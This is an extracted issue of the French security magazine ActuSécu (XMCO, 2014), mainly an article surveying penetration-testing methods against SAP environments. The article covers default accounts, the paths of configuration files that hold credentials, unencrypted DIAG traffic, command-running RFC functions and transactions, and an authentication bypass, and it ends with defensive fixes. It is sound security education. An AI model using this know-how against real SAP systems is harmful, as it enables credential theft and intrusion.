You are on page 1of 69

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

1
lACTUSCU est un magazine numrique rdig et dit par les consultants du cabinet de conseil XMCO JUIN 2014
g
T
a
r
d
e
d
37
actu
scu
Et toujours la revue du web et nos Twitter favoris !
Tests dintrusion SAP
Etat de lart sur les mthodes dintrusion utilises sur ce type denvironnement
Confrences
Hackito Ergo Sum et Gsdays
Les dessous de BlackPOS
Analyse du malware utilis dans le cadre de lattaque de Target
Actualit du moment
Faille Heartbleed (2014-0160), Apple vs SSL et Bitcoins
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
2
www.xmco.fr
we deliver security expertise

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
3
Vous tes concern
par la scurit informatique
de votre entreprise ?
XMCO est un cabinet de conseil dont le mtier est
laudit en scurit informatique.
Fond en 2002 par des experts en scurit et dirig par ses
fondateurs, les consultants de chez XMCO ninterviennent que
sous forme de projets forfaitaires avec engagement de rsultats.
Les tests dintrusion, les audits de scurit, la veille en
vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales
dans le cadre de missions daccompagnement de RSSI,
dlaboration de schma directeur ou encore de sminaires de
sensibilisation auprs de plusieurs grands comptes franais.
Pour contacter le cabinet XMCO et dcouvrir nos prestations :
http://www.xmco.fr
Test dintrusion
Audit de Scurit
Certication PCI DSS
Cert-XMCO

: Veille en vulnrabilits et
Cyber-surveillance
Cert-XMCO

: Rponse intrusion
Mise lpreuve de vos rseaux, systmes et applications web par nos
experts en intrusion. Utilisation des mthodologies OWASP, OSSTMM, CCWAPSS.
Audit technique et organisationnel de la scurit de votre Systme
dInformation. Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.
Conseil et audit des environnements ncessitant la certication PCI DSS
Level 1 et 2.
Suivi personnalis des vulnrabilits, des menaces et des correctifs affectant
votre Systme dInformation et surveillance de votre primtre expos sur
Internet
Dtection et diagnostic dintrusion, collecte des preuves, tude des logs,
autopsie de malware.
Nos services
we deliver security expertise

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
4
p. 6
Les dessous de BlackPOS
Analyse du malware utilis dans
le cadre de lattaque de Target
Tests dintrusion SAP
Etat de lart sur les mthodes
dintrusion utilises sur ce type
denvironnement
p. 43
Confrences
Hackito Ergo Sum et Gsdays
Actualit du moment
Faille Heartbleed (2014-0160),
Apple vs SSL et Bitcoins
Contact Rdaction : actu.secu@xmco.fr - Rdacteur en chef : Adrien GUINAULT - Direction artistique :
Romain MAHIEU - Ralisation : Agence plusdebleu - Contributeurs : Antonin AUROY, Stphane AVI, , Etienne
BAUDIN, Frdric CHARPENTIER, Charles DAGOUAT, Damien GERMONVILLE, Yannick HAMON, Marc LEBRUN,
Romain LEONARD, Thomas LIAIGRE, Cyril LORENZETTO, Rodolphe NEUVILLE, Julien MEYER, Stphanie RAMOS,
Arnaud REYGNAUD, Julien TERRIAC, Pierre TEXIER, David WEBER.
Conformment aux lois, la reproduction ou la contrefaon des mo-
dles, dessins et textes publis dans la publicit et la rdaction de
lActuScu 2014 donnera lieu des poursuites. Tous droits rservs
- Socit XMCO. la rdaction dcline toute responsabilit pour tous les
documents, quel quen soit le support, qui lui serait spontanment
con. Ces derniers doivent tre joints une enveloppe de rexpdi-
tion prpaye. Ralisation, Juin 2014.
p. 20
sommaire
p. 6
p. 43
p. 64
p. 30
p. 30
p. 64
La revue du web et Twitter
Slection de liens et de comptes
Twitter
p. 20
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
5
> Introduction
Des technologies varies
Une architecture SAP se compose de nombreuses briques
techniques, savoir :
+
des serveurs Windows et/ou Linux hbergeant les lo-
giciels SAP ;
+
dun routeur SAP (SAProuter), sorte de proxy per-
mettant daccder lensemble des points dentres of-
ferts par larchitecture. Il permet ainsi de centraliser les
connexions sans avoir exposer les autres composant ;
Depuis quelques annes, les ERP sont devenus une pierre angulaire dun Systme dInformation. Ces architec-
tures permettent dagrger et de consolider les donnes sensibles de nombreux dpartements de lentreprise
en une seule et mme application. Dans ce milieu, deux entreprises se partagent la part du gteau : People Soft
(Oracle) et SAP. La scurit de ces architectures est donc devenue primordiale et la complexit de ces dernires
induit des failles de scurit diverses et varies.
Dans cet article, nous tenterons dexpliquer les principaux axes dattaques des architectures SAP et les vulnra-
bilits les plus communment rencontres lors de tests dintrusion.
lheure o nous crivons cet article, Intrinsec nous a dj devanc et prsente certains dtails techniques dans
le numro 72 de MISC ;-) Nous tenterons donc de complter ces propos avec dautres exemples et scnarios
concrts dexploitation.
> Etat de lart des tests dintrusion SAP
Par Marc LEBRUN et Adrien GUINAULT
+
dapplications web (Netweaver, Business Object,
etc) ;
+
de bases de donnes (Microsoft SQL, Oracle) qui
stockent les donnes et les informations dauthenti-
cation des utilisateurs.
Tests dintrusion SAP
j
a
y
g
o
l
d
m
a
n
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
6
Les interfaces utilisateur
Ct client, deux moyens sont gnralement utiliss pour
accder larchitecture SAP :
+
un client lger (navigateur) au travers de linterface
ICM (composant Web de SAP Netweaver) ;
+
un client lourd appel SAPGUI au travers dun proto-
cole propritaire (gnralement via un port dans la plage
32XX).
Lauthentication sur un environnement SAP ncessite un
identiant, un mot de passe ainsi quun numro de client
(mandant), information 3 chiffres (de 000 999) per-
mettant dorganiser et de cloisonner les donnes.
Les protocoles utiliss
Les protocoles utiliss dans ce type darchitecture sont
nombreux. Cependant, pour la plupart des attaques et des
risques que nous allons prsenter par la suite, seuls 4 pro-
tocoles sont retenir. Ces derniers constituent les portes
dentre lenvironnement SAP.
On retrouve donc ces quatre protocoles principaux :
+
HTTP/HTTPS pour les accs au portail web et pour in-
teragir avec la SAP MMC (fonctions normalement rser-
ves aux administrateurs). Les ports associs sont 80, 443
ou 50100 (pour le portail web) et 50013 pour la console
MMC (ces ports peuvent bien sr varier dune architecture
lautre).
+
le protocole SAP DIAG (Dynamic Information and Ac-
tion Gateway), protocole propritaire SAP utilis pour la
communication client/serveur entre le client SAP GUI et
linstance SAP. Nous verrons par la suite quil souffre dun
problme important sil nest pas implment avec des
options de scurit additionnelles. Le service en question
sexcute gnralement sur les ports 32XX ou 33XX.
+
le protocole RFC (Remote Function Call) utilis pour
appeler des modules SAP et raliser des oprations dis-
tance sur les systmes SAP. Ce protocole est gnralement
expos sur les ports 80XX et implment par la gateway
(SAProuter)
+
les protocoles de bases de donnes propritaires
(Oracle et Microsoft SQL essentiellement) lorsque larchi-
tecture na pas t dploye dans les rgles de lart (port
SQL expos directement sur le rseau...).
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
7
> Vulnrabilits affectant le socle de
linfrastructure
Lors de la ralisation daudits sur des environnements SAP,
il est important de ne pas ngliger linfrastructure sous-
jacente. En effet, linstar de nimporte quel test dintru-
sion ou audit ralis en interne, il faut aborder lenviron-
nement audit comme un tout o une faiblesse affectant
le socle systme peut tout autant conduire la compro-
mission de donnes mtiers quune vulnrabilit affectant
la solution elle-mme.
Les systme dexploitation
Premier point, le systme dexploitation. Enn plus prci-
sment, les systmes dexploitation. En effet, il nest pas
rare que plusieurs types de systmes dexploitation consti-
tuent la base de lenvironnement SAP. Windows, distribu-
tions Linux (commerciales ou non) ou autres Solaris et AIX
ont tous leurs spcicits et les attaques habituellement
ralises sur ces systmes doivent galement faire partie
intgrante de la dmarche daudit/test dintrusion SAP.
Nous ne dtaillerons pas ici la mthodologie prcise mise
en uvre par les quipes dXMCO, mais quelques points
de contrle importants doivent toutefois tre mentionns.
+
Les partages rseau
Ils regorgent souvent de documents sensibles, chiers de
conguration, scripts dinstallation ou de maintenance,
tous susceptibles de contenir des donnes didentication
rutilisables sur le rseau. Le raccourci du pentester en
somme... Les environnements SAP ny chappent pas et
les partages rseau doivent tre soigneusement pluchs
an dy trouver scripts VBS/VBE, documents Excel, voire
mme chiers de conguration SAP. Ces chiers fourniront
des informations relatives aux systmes et aux services
dploys, identiants et, trop souvent, des mots de passe
permettant de se connecter sur une interface administra-
tive, un domaine ou une base de donnes.
+
Les comptes sur le systme
En dehors des comptes Administrateur, Administrator,
admin ou root, souvent prsents par dfaut sur certains
systmes, on peut galement compter sur la prsence de
comptes utilisateurs ncessaires au bon fonctionnement
de linfrastructure SAP. Chaque machine de lenvironne-
ment se voit habituellement attribuer un SID ( SAP Sys-
tem Id , ne pas confondre avec les SID de bases de don-
nes Oracle), et des comptes locaux bass sur ce SID sont
crs an de servir de comptes de service. Par exemple
il nest pas rare de trouver des comptes locaux dont les
noms dutilisateurs prennent une des formes suivantes :
+
<SID>adm ;
+
ORA<SID> ;
+
SAPService<SID>.
Dcouvrir la prsence de comptes locaux par dfaut ou
dont le nom dutilisateur est prdictible offre alors la
possibilit de raliser des attaques par force brute an
didentier ceux qui reposent sur un mot de passe faible
ou trivial.

+
Permissions des chiers
La compromission dun des systmes de lcosystme SAP
peut avoir des consquences fcheuses, mme si latta-
quant ne dispose pas de droits super-utilisateur. En ef-
fet, il nest pas rare dobserver que les contrles daccs
sur certains chiers de conguration sensibles sont trop
permissifs (755 ou mme 777). Parmi les chiers les plus
intressants, on retrouve :
+
les chiers de conguration des bases de donnes
Oracle (donnes, mots de passe SAP et Oracle chiffrs) :
/oracle/<Oracle DB SID>/sapdata/system_1/system.
data1
+
les chiers de conguration SAP (mots de passe SAP
chiffrs) :
/usr/sap/<SAPSID>/<Instance ID>/sec/*
/usr/sap/<SAPSID>/<Instance ID>/sec/sapsys.pse
+
Les chiers de conguration SAP CongTool (informa-
tions de connexion et mots de passe Oracle) :
/usr/sap/<SAP SID>/SYS/global/security/data/SecStope.
properties
/usr/sap/<SAPSID>/SYS/global/security/data/SecStope.
key
+
les journaux dvnements J2EE (mots de passe) :
/usr/sap/<SAPSID>/<InstanceID>/j2ee/cluster/dis-
patcher/log/defaultTrace.0.trc
+
les chiers de conguration ICM (mots de passe chif-
frs) :
/usr/sap/<SAPSID>/SYS/exe/u/NTI386/icmauth.txt
Tests intrusion SAP
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
8
+
Le niveau de mise jour
Enn, dans le cadre de tests dintrusion en bote blanche
ou si un audit de conguration est ralis en complment,
il est intressant de relever la frquence et le niveau de
patch des serveurs. En effet, des mises jour sont rguli-
rement publies par les diteurs et corrigent des vulnra-
bilits dont lexploitation pourrait avoir des consquences
importantes (lvation de privilges, dni de service,
etc.).
Les bases de donnes
De plus, SAP repose sur plusieurs technologies tierces :
bases de donnes Oracle ou Microsoft, Java embarqu,
serveurs applicatifs. ... Or, ces composants sont galement
sujets des failles de scurit ou des dfauts de congu-
ration et peuvent donc introduire des faiblesses au sein de
lenvironnement SAP.
+
Oracle
En premier lieu, on retrouve les produits Oracle, notam-
ment les gestionnaires de bases de donnes. Ces solutions
disposent souvent linstallation de SID et comptes par
dfaut qui peuvent ne pas avoir t dsactivs ou suppri-
ms. De nombreux outils publics permettent lnumra-
tion et la dcouverte de ces comptes et SID.
En plus des comptes Oracle habituellement
prsents par dfaut,
on peut galement trouver des identiants
spciquement crs lors de linstallation
SAP : les comptes DBSNMP et SAPR3 sont de
bons exemples...
En plus de ces comptes Oracle habituellement prsents
par dfaut, sur ces bases de donnes, on peut galement
trouver des identiants spciquement crs lors de lins-
tallation SAP : les comptes DBSNMP et SAPR3 sont de bons
exemples, car ils sont crs presque systmatiquement et
leurs mots de passe par dfaut sont publiquement connus.
La fonctionnalit REMOTE_OS_AUTHENT est un autre
exemple de faiblesse qui peut tre apporte par un produit
Oracle. Cette fonctionnalit est souvent active par dfaut
au sein des environnements SAP et permet de dlguer
lauthentication dutilisateurs distants leurs systmes
dexploitation locaux respectifs. Cette fonctionnalit est
souvent abuse par les attaquants, qui crent un compte
dont le nom dutilisateur respecte la nomenclature Oracle
(prx par OPS$, en gnral) sur leur systme local an
de se connecter distance sur les bases de donnes sans
avoir connatre le mot de passe de ce compte Oracle.
Il faut galement noter que certaines versions des pro-
duits SAP ou des environnements spciques peuvent n-
cessiter lactivation de cette fonctionnalit pour fonction-
ner correctement. Dans ce cas, concevoir un mcanisme
ad hoc pour viter lutilisation de cette fonctionnalit peut
savrer tre une tche complexe et coteuse.
Dans tous les cas, la compromission dune base Oracle
constitue une brche majeure dans lenvironnement SAP.
La rcupration de noms dutilisateurs et de condensats
de mots de passe au sein de la table USR02 peut en effet
permettre dobtenir des accs privilgis sur linfrastruc-
ture SAP (voir Bonus).
+
Microsoft SQL
Microsoft SQL Server est une solution galement frquem-
ment rencontre en environnement SAP et constitue un
vecteur dattaques supplmentaire. Comptes par dfaut,
mots de passe faibles voire triviaux et excution de com-
mandes distance via la procdure xp_cmdshell, voil la
mthodologie classique, souvent mise en uvre par les
pirates et les pentesters. La compromission du systme
sous-jacent par ce biais et la rcolte des informations et
identiants prsents sur la machine peut alors tre le
point de dpart dune intrusion en profondeur dans lin-
frastructure SAP.
> INFO
Des malwares ciblent SAP...
SAP tait jusqu prsent pargn par les malwares et autres
attaques automatises par les pirates. Il semblerait que cela ne
soit dsormais plus le cas.
En effet, les chercheurs de la socit ERPScan auraient identi
un premier logiciel malveillant ciblant spciquement les sys-
tmes SAP. Pour cela, le logiciel malveillant, un banker per-
mettant de drober les identiants et les mots de passe utiliss
par les internautes an de se connecter leur banque en ligne,
embarque une nouvelle fonctionnalit permettant de dtecter
la prsence du client SAP sur le poste compromis.
Daprs les premires analyses, le malware ne fait actuelle-
ment rien de plus. Pour les chercheurs, cela suggre que les pi-
rates valuent actuellement lintrt de sattaquer SAP. Deux
options soffriraient alors aux pirates :
- revendre aux personnes malveillantes intresses laccs aux
systmes compromis disposant dun accs la plateforme SAP
de lentreprise ;
- tirer directement parti de laccs SAP.
Daprs les chercheurs, il sagit l du premier malware recher-
chant spciquement les installations SAP. Enn, SAP tant
souvent considr comme tant le coeur de lentreprise, les
attaques ciblant cette plateforme pourraient savrer particu-
lirement dvastatrices pour leur sant nancire.
Enn, noter que les chercheurs ayant dcouvert le malware
avaient dj rapport SAP lexistence de failles de scurit
critiques pouvant tre exploites distance sans authenti-
cation pralable. SAP a publi des correctifs dans les derniers
mois, mais tant donn le dlai dapplication souvent impor
tant, le danger est rel pour les entreprises utilisant SAP.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
9
Les serveurs applicatifs
De nombreuses autres solutions logicielles tierces sont
souvent embarques par ces systmes, tort ou raison
dailleurs. Et il nest pas rare de rencontrer des serveurs
applicatifs Jboss, Apache Tomcat ou IBM WebSphere qui
apportent leur lot de vulnrabilits. Encore une fois, cest
lexposition dinterfaces dadministration couple la
prsence de comptes par dfaut qui permettent souvent
aux attaquants de prendre le contrle de ces systmes
sans effort. De plus, ces solutions ou les technologies sur
lesquelles elles reposent (notamment Java) sont rguli-
rement sujettes la publication de vulnrabilits et de
codes dexploitation qui sont autant de coups ports lin-
tgrit de la plate-forme.
Enn, il ne faut pas non plus oublier que les environne-
ments rgis par SAP incluent bien souvent des parties lo-
gicielles dveloppes sur-mesure, parfois en interne, qui
peuvent galement apporter de nouvelles failles...
Le ltrage rseau
Le ltrage rseau est le quatrime lment de linfrastruc-
ture auquel il faut consacrer une attention particulire. Le
nombre de services SAP ncessitant dtre exposs aux
utilisateurs est, en fait, plutt rduit et il convient de
mettre en place un ltrage rseau (Firewall + SAProuter)
ne permettant daccder quaux htes et aux ports nces-
saires.
Les ports les plus couramment utiliss par SAP sont
connus:
+
pour un accs par le client lourd, SAPGUI, les ports 3200
3299 sont les plus souvent utiliss, mais on retrouve sur
certaines congurations les plages 33xx ou 36xx ;
+
linterface web ICM est congure habituellement
pour tre joignable sur le port 50013 (ou un autre de la
plage 50xxx) ;
+
les accs RFC distance seffectuent en gnral sur les
plages 80xx (HTTP SOAP) et 81xx (HTTPS SOAP).
Dans la plupart des cas, il ny a besoin de laisser passer
que le trac entre le SAP Routeur et le client lourd. Il ny
a en gnral pas de raison dexposer les autres services
(SSH, listeners Oracle, Terminal Services, Web services,
serveurs Web applicatifs, ...) dautres postes ou VLAN
que ceux des administrateurs.
Enn, juste quelques mots sur les accs physiques. Lin-
frastructure SAP, et notamment les donnes et ressources
quelle hberge, constitue presque toujours une ressource
hautement stratgique pour lentreprise audite. Il ne
faut donc pas ngliger les risques lis aux accs physiques
aux composants de cet environnement. Les Bonnes Pra-
tiques concernant cet aspect de la scurisation des SI sap-
pliquent donc ici aussi.
Tests intrusion SAP
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
10
> Vulnrabilits affectant les composants SAP
De prime abord, sattaquer directement lcosystme SAP peut sembler tre une tche difcile, notamment lorsquon est
peu familiaris avec les produits qui le composent.
Reconnaissance et prise dempreintes
Les oprations de scanning et de dcouverte ralises dans le cadre de tests dintrusions classiques restent valides. Les
outils habituellement utiliss, tel Nmap, permettront de rapidement tablir un inventaire complet des services dploys,
mais lutilit de cet outil sarrte l. En effet, le Nmap Script Engine, bien que trs efcace sur certaines technologies,
nembarque que peu de scripts permettant de prendre les empreintes des services SAP, lexception notable du script
maxdb-info permettant dobtenir des informations techniques partir des services SAP Max DB. Enn, pour tre tout
fait honntes, les scripts NSE ciblant les services de bases de donnes Oracle trouveront bien souvent une utilit dans un
contexte SAP :-)
Cependant la conguration prsente par dfaut sur ces produits peut laisser ltrer de nombreuses informations techniques,
quun attaquant mettra vite prot... Ainsi, si les services ICM/ICF (SAP Internet Communication Framework) sont acces-
sibles, il est bien souvent possible dinterroger ces web services SOAP sans authentication pralable.
Les informations prsentes lURI /sap/public/info, par exemple, informent ainsi tout utilisateur non authenti sur le
type de gestionnaire de base de donnes sur lequel le service repose, le type et le numro de version prcis du systme
dexploitation sous-jacent et son SAP System ID (SID). Il existe dailleurs un module au sein de Metasploit permettant de
raliser la rcolte de ces informations sur de nombreux services.
Ces informations peuvent galement tre obtenues en faisant appel SOAP RFC_SYSTEM_INFO, mais celui-ci ncessite de
possder des identiants valides sur ces interfaces. Toujours sans authentication, il est possible dinterroger les services
SOAP de la SAP Management Console et de consulter des journaux dvnements et des traces de dveloppement :
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
11
Or, ces journaux dvnements conservent les traces dac-
tions ralises par les utilisateurs SAP, notamment les
identiants de ces utilisateurs. Metasploit rend lextraction
de ces donnes triviale :
Les comptes prsents par dfaut
Reprenons notre numration des vulnrabilits propres
SAP depuis le dbut... Car la rcolte dinformations, cest
trs pratique et cela permet davancer dans lintrusion en
identiant des cibles potentielles, mais nexiste-t-il pas
des comptes prsents par dfaut qui fourniraient imm-
diatement un accs au cur de la machine ? surprise, il
existe des comptes et des mots passe prsents par dfaut
sur les produits SAP aussi... Et pour ne rien arranger, il
sagit le plus souvent de comptes disposant daccs privi-
lgis. Parmi les plus courants, on retrouve :
En effet, il nest pas rare que nos consultants dcouvrent
que ces comptes prsents par dfaut nont jamais t mo-
dis par les administrateurs. Inutile de rappeler ici que
les attaquants (et les auditeurs) adorent tirer parti de ces
vulnrabilits particulirement triviales exploiter, peu
coteuses en termes de ressource, et ce pour un prot
maximal (accs super-administrateur)...
La condentialit des changes (DIAG et HTTPs)
Les changes entre un client et un serveur constituent
lune des pistes privilgies pour un attaquant. En effet,
lorsque larchitecture cible est scurise et quil nexiste
aucun moyen de pntrer lenvironnement SAP (ce qui
arrive rarement, mais on ne sait jamais :-), lattaquant va
tenter de cibler les utilisateurs naux. Dans ce cadre, les
protocoles clients deviennent importants pour la scurit
de lensemble de lenvironnement.
Deux canaux privilgis sont alors prendre en compte :
+
Les communications au travers du client lourd SAP
Le client SAP GUI est utilis pour se connecter sur le port
32XX o le XX correspond au system number . Ce
premier mode de communication client-serveur souffre
malheureusement par dfaut dun problme de scurit
important. En effet, les communications seffectuent au
travers dun protocole propritaire appel DIAG, protocole
qui ne repose sur aucune forme de chiffrement. Les don-
nes sont seulement compresses par un algorithme pro-
pritaire.
La faiblesse tant connue depuis quelques annes main-
tenant, des chercheurs ont dcortiqu cet algorithme de
compression si bien quil est maintenant trs simple de
dcompresser ces donnes et de rcuprer en clair les
identiants et mots de passe transitant entre le client et
le serveur.
La mthode la plus simple est dutiliser un outil cl en
main tel que SapCap ou Cain & Abel, qui permettent tout
deux lobtention des communications en clair.
Tests intrusion SAP
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
12
Parmi celles-ci, on trouve nombres de vulnrabilits Web
classiques : XSS, SQL Injection, XXE... En effet, il ne faut
pas oublier que SAP Netweaver est avant tout un serveur
applicatif ABAP reposant sur J2EE, et tous les membres du
Top10 de lOWASP peuvent donc se joindre la fte...
Une simple recherche sur CVE Details remonte 38 vulnra-
bilits affectant SAP Netweaver depuis 2008, dont 6 ayant
un score CVSS suprieur ou gal 7.5...
Pas moins dune douzaine de vulnrabilits XSS et trois
injections SQL ont t publiquement rfrences sur ce
produit sur les trois dernires annes. Mais plusieurs vul-
nrabilits permettent galement un attaquant de faire
raliser des actions malveillantes aux serveurs SAP, direc-
tement ou non. lorigine de ces vulnrabilits, on re-
trouve, par exemple :
+
un servlet J2EE fournissant des fonctionnalits dexcu-
tion de commandes sans authentication pralable (voir
Bonus) ;
+
des paramtres HTTP GET non ltrs permettant de r-
aliser des attaques SMB Relay et de voler des identi-
ants valides sur le systme (et disposant de droits dad-
ministration pour les systmes Windows).
Parmi ces vulnrabilits applicatives, une dentre elles a
fait beaucoup de bruit. En effet, en 2011, une vulnrabilit
affectant le composant ctc a t publie. Cette der-
nire permettait de contourner lauthentication en en-
voyant de simples requtes HTTP avec la mthode HEAD
(un got de dj vu, non ?).
Ainsi, en contournant lauthentication, il tait possible
dappeler des fonctions permettant dexcuter des com-
mandes sur les serveurs SAP (voir capture suivante). Et
comme le compte de service utilis par SAP possde trs
souvent des droits levs sur le systme, lattaquant peut
alors crer un utilisateur et prendre le contrle du serveur
sous-jacent (si un ventuel ltrage rseau permet dat-
teindre les ports 445 ou 3389).
Des outils tels que Metasploit, Bizsploit ou ERPscan sont
particulirement bien quips pour exploiter les failles ap-
plicatives mentionnes ici.
Une solution alternative (quand on est perdu dans les
innombrables dpendances de SapCap par exemple...)
est de recompiler Wireshark en incluant le dissecteur
dvelopp cet effet par Core Security (disponible ici
http://corelabs.coresecurity.com/index.php?action=view&-
module=Wiki&name=SAP_Dissection_plu-gin_for_
Wireshark&type=tool).
Une simple coute du rseau permet donc de rcuprer
les identiants de la victime. Ce problme est connu de-
puis de nombreuses annes et dailleurs clairement spci-
au sein de la note SAP 39029 :
This compression is not an encryption. To transfer data in
encrypted form, use our Secure Network Communications
(SNC) and an external security product. . . . For production
scenarios, we strongly recommend the use of SNC.
Le protocole SNC (Secure Network Communication) peut
tre utilis pour rpondre ce besoin. En effet, ce der-
nier se base sur la librairie cryptographique reposant sur le
standard GSS-APIv2 et permet dassurer lauthentication,
lintgrit et le chiffrement des donnes changes.
En 2011, une vulnrabilit
affectant le composant ctc ... permettait de
contourner lauthentication
en envoyant de simples requtes HTTP
avec la mthode HEAD
Pendant longtemps limplmentation gratuite de SNC
tait rserve aux communications entre serveurs. Elle
est dornavant disponible gratuitement pour les clients,
et ce depuis 2011. Il est donc recommand dactiver cette
simple option permettant de scuriser les donnes chan-
ges au travers dun protocole chiffr.
+
Les communications au travers du client lger
Un dfaut de conguration similaire affecte galement
souvent la console de gestion SAP, les Web Services SOAP
et laccs lapplication ICM. Tous ces changes entre le
client et le serveur sont en effet effectus via le protocole
HTTP (non chiffr) par dfaut. Or lauthentication de luti-
lisateur est ralise en Basic ou envoys en clair dans la
requte POST. Les identiants circulent donc encore une
fois en clair (enn, encods en base64 pour tre tout fait
prcis) sur le rseau...
Vulnrabilits applicatives
De par leur grande popularit, notamment au sein de
grands groupes, les produits dits par SAP reprsentent
une cible de choix autant pour les pirates que les cher-
cheurs en scurit. De nombreuses failles de scurit, aux
criticits variables, ont ainsi t dcouvertes et rendues
publiques ces dernires annes.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
13
On surestime aussi souvent le niveau de scurit de la
SAP GUI et des plus de 1000 contrles ActiveX qui laccom-
pagnent lors de son installation. Ce sont autant de com-
posants potentiellement vulnrables des overows
et autres vulnrabilits applicatives menant lexcution
de code distance. Avant de pouvoir dposer des trojans,
lire des chiers locaux et distants, rebondir et attaquer des
serveurs du LAN, il faudra tout de mme parvenir faire
excuter le code malveillant un client peu mant (via
une campagne de Phishing ou de Social Engineering par
exemple). Mais ce client logiciel nest jamais mis jour
manuellement par les utilisateurs et il est relativement
rare que les administrateurs pensent linclure dans le
processus de patch management. Ce composant repr-
sente donc tout de mme un vecteur dattaque crdible.
Enn, comme vu plus haut, on peut mettre en doute la
capacit de SAP GUI protger les mots de passe des uti-
lisateurs, quand ce ne sont pas les utilisateurs eux-mmes
qui enregistrent leur mot de passe SAP dans le chier rac-
courci utilis pour lancer lapplication...
Problmes dautorisation et transactions dangereuses
Autre problme de scurit rcurrent, les contrles dac-
cs sont parfois manquants sur certaines transactions ou
fonctions RFC. La gestion et le cloisonnement des prols
SAP est en effet un mtier part entire. Les autorisations
des prols peuvent tre gres de manire trs prcise et
ncessitent certaines comptences et une bonne compr-
hension du mtier.
+
Les fonctions RFC
Ainsi, lorsquon dispose dun compte utilisateur SAP (mot
de passe par dfaut, identiants intercepts, extrait dune
base ORACLE, etc.), ltape suivante est de tenter dacc-
der des fonctions RFC intressantes via les Web Services
SOAP. Parmi celles-ci, RFCEXEC, SAPXPG et RFC_START_PRO-
GRAM peuvent permettre lexcution de commandes sur
les serveurs constituant linfrastructure SAP. Il nest mal-
heureusement pas rare que des prols utilisateurs peu pri-
vilgis, censs tre utiliss pour raliser des oprations
mtier, disposent de droits daccs sur ces fonctions.
ltape suivante est de tenter daccder
des fonctions RFC intressantes qui peuvent
permettre lexcution de commandes.
Il va sans dire que ces appels doivent tre dsactivs dans
les environnements o cela est possible, ou que leur accs
soit restreint aux seules personnes habilites aux opra-
tions de maintenance technique.
+
Les transactions dangereuses
On retrouve le mme problme avec les transactions uti-
lisables depuis le client SAPGUI (avec un compte utilisa-
teur SAP). Malheureusement, ou heureusement, question
de point vue :-), ces autorisations sont souvent laxistes
et permettent un utilisateur dappeler des transactions
sensibles. Parmi les transactions intressantes, on peut
noter les suivantes (la liste nest pas exhaustive) :
+
SU01 (gestion des utilisateurs) ;
+
SU02 (gestionnaire de rles) ;
+
SM49 et SM69 (excution de commandes sur le sys-
tme) ;
+
SM59 (conguration des connexions RFC) ;
+
SE16 (lecture de table de base de donnes) ;
+
SE38 (gnrateur de programmes) ;
+
STMS (Transport Management System).
Ainsi, sil possde les droits pour appeler ces fonctions, un
utilisateur peut excuter des commandes au travers de la
transaction SM49 ou encore utiliser des transactions pour
lire le contenu de la table USR02 de la base de donnes
contenant les identiants et les condensats cryptogra-
phiques des mots de passe de tous les utilisateurs avec la
transaction SE16... Plutt pratique, non ?
Les autres vulnrabilits affectant le SAProuter
Dautres vulnrabilits affectent galement le SAP Rou-
teur, notamment des dfauts de conguration et des
manques dACL, mais galement des failles relativement
importantes, comme vu en 2013 avec un contournement
dauthentication et un buffer overow (CVE-2013-
7093 et CVE-2013-6817).
Nanmoins, il sagit dun composant central, souvent in-
Tests intrusion SAP
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
14

Glossaire
+
ABAP : Language de programmation utilis pour dve-
lopper les applications SAP
+
CRM : Customer Relationship Management (gestion
des clients et ventes)
+
ERP : Enterprise Resource Planning system (gestion des
employs et de la productivit)
+
Interfaces RFC (Remote Function Call) : Interfaces utili-
ses pour excuter des commandes distance
+
RFC : Remote Function Call, requtes sur des modules
SAP distance
+
SAP_ALL : Prol (rle) des comptes administrateurs
+
SAPGUI : Client lourd install sur les postes de travail
+
SAP Snap-In for MMC : SAP fournit par dfaut un Snap-
In qui permet dutiliser la console MMC de Windows an
dinteragir avec la conguration SAP.
+
SID : SAP System ID, identiant attribuer chaque sys-
tme SAP
+
Transactions : squence dactions permettant dacc-
der des oprations de la base de donnes SAP. Elles sont
identies par un code transaction (Ex: SU01, SE16, FK01,
PA20)
Tests intrusion SAP
dispensable au bon fonctionnement de lenvironnement
SAP. Et les forts risques de perturbation ou de dni de ser-
vice lis lexploitation de vulnrabilits sur cet quipe-
ment, nous conduisent le considrer comme un vecteur
dattaque de dernier recours. En effet, mme sur un envi-
ronnement de test, les clients et les responsables applica-
tifs ne sont jamais enclin laisser les consultants raliser
des attaques pouvant mettre en pril la disponibilit des
environnements.
Cest pour cette raison que les attaques telles que Evil
Twin ou encore Call back , permettant au travers
denregistrement de serveurs tiers de sinsrer dans une
communication entre un client et larchitecture SAP, sont
rarement mises en oeuvre. En pratique, il nest quasiment
jamais ncessaire de sattaquer ce composant pour
mettre un pied en zone SAP.
> Conclusion
Pour faire honneur la tradition XMCO, nous vous propo-
sons de conclure cet article sur quelques Quick Wins ,
des actions simples raliser et peu coteuses en temps
et en ressources, et qui permettent nanmoins de relever
le niveau de scurit de linfrastructure SAP.
+
QuickWin #1 : Dnir de nouveaux comptes super-ad-
ministrateurs et retirer les privilges au compte SAP*.
+
QuickWin #2 : Changer les mots de passe de tous les
comptes par dfaut (SAP, Oracle, SQL Server, etc.), ou en-
core mieux, les dsactiver.
+
QuickWin #3 : Filtrer les accs vers les serveurs SAP,
seuls les ports utiliss par SAPDIAG et la console Netwea-
ver (HTTP et/ou MMC) doivent tre autoriss depuis le
VLAN utilisateur.
+
QuickWin #4 : Activer le SSL en cas de connexion via la
MMC, les web services ou la console Web, activer le pro-
tocole SNC pour les communications avec le client SAPGUI.
+
QuickWin #5 : Restreindre ou dsactiver les accs aux
transactions dangereuses.
+
